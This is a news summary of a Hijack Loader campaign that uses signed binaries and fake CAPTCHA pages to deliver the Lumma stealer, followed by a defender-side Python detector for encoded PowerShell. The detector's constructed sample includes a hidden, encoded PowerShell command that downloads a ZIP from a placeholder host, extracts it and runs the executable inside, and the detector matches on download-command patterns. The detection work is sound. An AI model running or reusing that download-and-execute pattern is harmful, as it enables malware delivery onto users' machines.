Cybersecurity researchers from HarfangLab have discovered a new malware campaign involving Hijack Loader artifacts signed with legitimate code-signing certificates. The attack chains aim to distribute an information stealer called Lumma by tricking users into downloading a booby-trapped binary disguised as pirated software or movies. The campaign has gone through variations that direct users to fake CAPTCHA pages, coercing them to run encoded PowerShell commands that drop a malicious payload in ZIP archive form.

Researchers uncover malware using stolen code-signing certificates

The delivery tactic switched from DLL side-loading to signed binaries in early October 2024 to avoid detection. Some certificates used were stolen and revoked, while others may have been generated by threat actors, challenging the notion that code-signing alone ensures trustworthiness. This investigation coincides with SonicWall Capture Labs' warning of a surge in cyber attacks with CoreWarrior malware infecting Windows machines. The report also highlights phishing campaigns distributing XWorm malware via WSF and PowerShell scripts, leading to the injection of XWorm into legitimate processes. XWorm's updated versions include advanced capabilities to avoid detection and carry out malicious actions, reflecting the evolving landscape of cyber threats and the need for robust security measures to safeguard systems and data against sophisticated attacks.
https://thehackernews.com/2024/10/researchers-uncover-hijack-loader.html
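A defender-side detection example for the fake-CAPTCHA chain described above (added here; not code from HarfangLab's report or the article): it decodes PowerShell -EncodedCommand arguments found in process-creation command lines and flags those whose script both downloads and expands a ZIP archive. The log events are constructed samples and example.invalid is a placeholder host.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...),
# so match prefixes rather than one spelling. "-ep" (ExecutionPolicy) does not match.
def is_encoded_flag(arg: str) -> bool:
    a = arg.lower()
    return len(a) >= 2 and a.startswith("-e") and "-encodedcommand".startswith(a)

def decode_encoded_command(cmdline: str):
    """Return the decoded script behind -EncodedCommand, or None if absent/invalid."""
    parts = cmdline.split()  # base64 never contains whitespace, so a plain split is enough
    for i, arg in enumerate(parts[:-1]):
        if is_encoded_flag(arg):
            try:
                raw = base64.b64decode(parts[i + 1].strip('"\''), validate=True)
                return raw.decode("utf-16-le")  # -EncodedCommand is base64 over UTF-16LE
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None

# Indicators tied to the reported chain: a download primitive plus a ZIP archive.
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
ZIP = re.compile(r"expand-archive|\.zip\b", re.I)

def classify(cmdline: str) -> dict:
    script = decode_encoded_command(cmdline)
    result = {"encoded": script is not None, "downloads": False, "zip": False, "suspicious": False}
    if script is None:
        return result
    result["downloads"] = bool(DOWNLOAD.search(script))
    result["zip"] = bool(ZIP.search(script))
    result["suspicious"] = result["downloads"] and result["zip"]  # both present -> alert
    return result

def to_encoded(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build constructed samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed process command lines, not real telemetry
    "powershell.exe -w hidden -nop -enc " + to_encoded(
        "iwr http://example.invalid/captcha/verify.zip -OutFile $env:TEMP\\v.zip; "
        "Expand-Archive $env:TEMP\\v.zip $env:TEMP\\v; Start-Process $env:TEMP\\v\\verify.exe"),
    "powershell.exe -EncodedCommand " + to_encoded("Get-Service | Where-Object Status -eq Running"),
    "powershell.exe -Command Get-Date",
]

def scan(events):
    """Return one suspicious/benign verdict per command line."""
    return [classify(e)["suspicious"] for e in events]
```

The verdict is intentionally conservative: a benign encoded admin command (event 2) and a plaintext command (event 3) stay unflagged, while only the download-plus-ZIP pattern from the reported chain alerts.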